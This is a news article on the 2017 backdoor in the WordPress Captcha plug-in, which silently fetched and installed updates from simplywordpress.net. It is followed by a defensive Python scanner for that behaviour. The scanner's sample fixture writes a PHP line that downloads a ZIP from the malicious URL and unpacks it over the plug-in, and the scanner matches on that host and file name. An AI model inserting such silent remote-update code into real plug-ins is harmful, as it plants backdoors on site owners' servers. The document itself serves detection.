Popular WordPress plug-in compromised with malicious code

A popular WordPress plug-in installed on around 300,000 websites has been compromised with malicious code that opens a backdoor into those websites.

WordPress discovered the problem and banned the plug-in from the official WordPress plugin repository. It has also pushed users an updated version of the plug-in with the malicious code removed.

The plug-in, called Captcha, was a popular piece of CAPTCHA software developed by the WordPress development company BestWebSoft. However, the latest version has been plagued with security problems.

These problems started three months after BestWebSoft sold the free version of the plug-in to an organisation called Simply Wordpress. The new developer recently released version 4.3.7 of Captcha.

"Recently, we've handed over all the rights to use and manage the free version of Captcha plugin. Now, it has new owners which are responsible for the updates, troubleshooting and support any processes connected with its free version," the firm said in September.

This version contained malicious code that connects to the simplywordpress.net website and downloads and installs a plug-in update package without the site owner's knowledge.

Such behaviour is against WordPress repository rules and effectively creates a backdoor without users' knowledge, making it easier for criminals to hijack the affected websites.

That isn't the plug-in's only issue, either: it also contains code that lets the attackers remove traces of the backdoor, giving them a way to cover their tracks.

Worryingly, security specialists would not have come across the flaw at all if the WordPress team hadn't removed the plug-in on copyright grounds.

The WordPress team accused the plug-in's new developer of violating its copyright by using "WordPress" in the name and branding of Captcha.

Once this happened, Wordfence, a cyber security firm that makes firewall products for WordPress sites, was alerted to the removal and discovered the security vulnerability.

WordPress has removed the plug-in from its repository completely and is forcing affected websites to install the cleaned-up version. More than 100,000 websites have completed the update so far.

Matt Barry, a security specialist at Wordfence, said: "Whenever the WordPress repository removes a plug-in with a large user base, we check to see if it was possibly due to something security-related.

"Wordfence alerts users when any plug-in they are running is removed from the WordPress repo as well. At the time of its removal, Captcha had over 300,000 active installs, so its removal significantly impacts many users."

He explained: "This code triggers an automatic update process that downloads a ZIP file from https://simplywordpress[dot]net/captcha/captcha_pro_update.php, then extracts and installs itself over the copy of the Captcha plugin running on site.

"The ZIP contains a few small code changes from what is in the plugin repository, and it also contains a file called plugin-update.php, which is a backdoor."
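As an added, defender-side example (not code from the article, from Wordfence or from WordPress), the following Python script scans a WordPress plugins directory for the two indicators the article reports: a file named plugin-update.php and PHP source that references the simplywordpress.net update host. It also flags any plug-in file that calls WordPress's own download_url() and unzip_file() helpers together, a heuristic for silent self-update code that is my assumption rather than something the article states. The plug-in tree it scans is constructed inline as sample data; the file standing in for the backdoor is only a placeholder comment.

```python
"""Scan a WordPress plugins directory for the indicators reported in the article.
Added example; not Wordfence or WordPress code."""
import tempfile
from pathlib import Path

# Indicators taken from the article.
UPDATE_HOST = "simplywordpress.net"
BACKDOOR_FILENAME = "plugin-update.php"

# Heuristic (assumption, not from the article): a file that both downloads a
# remote file and unpacks a ZIP with WordPress's helpers has a self-update path.
SELF_UPDATE_CALLS = ("download_url(", "unzip_file(")


def scan_plugins(plugins_dir):
    """Return a list of (relative_path, reason) findings for every plug-in under plugins_dir."""
    base = Path(plugins_dir)
    findings = []
    for path in sorted(base.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(base).as_posix()
        if path.name == BACKDOOR_FILENAME:
            findings.append((rel, "file named like the reported backdoor"))
        if path.suffix.lower() != ".php":
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if UPDATE_HOST in text:
            findings.append((rel, f"references update host {UPDATE_HOST}"))
        if all(call in text for call in SELF_UPDATE_CALLS):
            findings.append((rel, "downloads and unpacks a ZIP (self-update capability)"))
    return findings


def affected_plugins(findings):
    """Collapse findings to the sorted set of top-level plug-in directory names."""
    return sorted({rel.split("/", 1)[0] for rel, _ in findings})


def build_sample_plugins(root):
    """Write a constructed plugins tree: one clean plug-in and one mimicking the
    behaviour the article describes. Sample data, not the real plug-in's source."""
    root = Path(root)
    clean = root / "hello-dolly"
    clean.mkdir(parents=True)
    (clean / "hello.php").write_text(
        "<?php\n// constructed: harmless plugin\nadd_action('admin_notices', 'hello_dolly');\n"
    )

    bad = root / "captcha"
    (bad / "includes").mkdir(parents=True)
    (bad / "captcha.php").write_text(
        "<?php\n// constructed: main plugin file\nrequire_once __DIR__ . '/includes/updater.php';\n"
    )
    (bad / "includes" / "updater.php").write_text(
        "<?php\n// constructed: fetches a ZIP from the update host and unpacks it over itself\n"
        "$tmp = download_url('https://simplywordpress.net/captcha/captcha_pro_update.php');\n"
        "unzip_file($tmp, WP_PLUGIN_DIR . '/captcha');\n"
    )
    (bad / BACKDOOR_FILENAME).write_text(
        "<?php\n// constructed placeholder standing in for the reported backdoor file\n"
    )
    return root


def run_demo():
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_plugins(build_sample_plugins(tmp))


if __name__ == "__main__":
    results = run_demo()
    for rel, reason in results:
        print(f"{rel}: {reason}")
    print("affected plug-ins:", affected_plugins(results))
```

On a real site you would point scan_plugins() at wp-content/plugins and treat any hit on the backdoor file name or the update host as grounds to replace the plug-in from the official repository; the self-update heuristic will also fire on some legitimate premium plug-ins that manage their own updates, so it is a prompt for review rather than proof of compromise.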

Plug-ins for widely used software, such as WordPress or web browsers, are increasingly targeted by companies looking to inject adware or other unwanted code.

The pattern is that the legitimate developer of the plug-in is tempted to sell it to a third party, and the third party then pushes an update containing malicious code.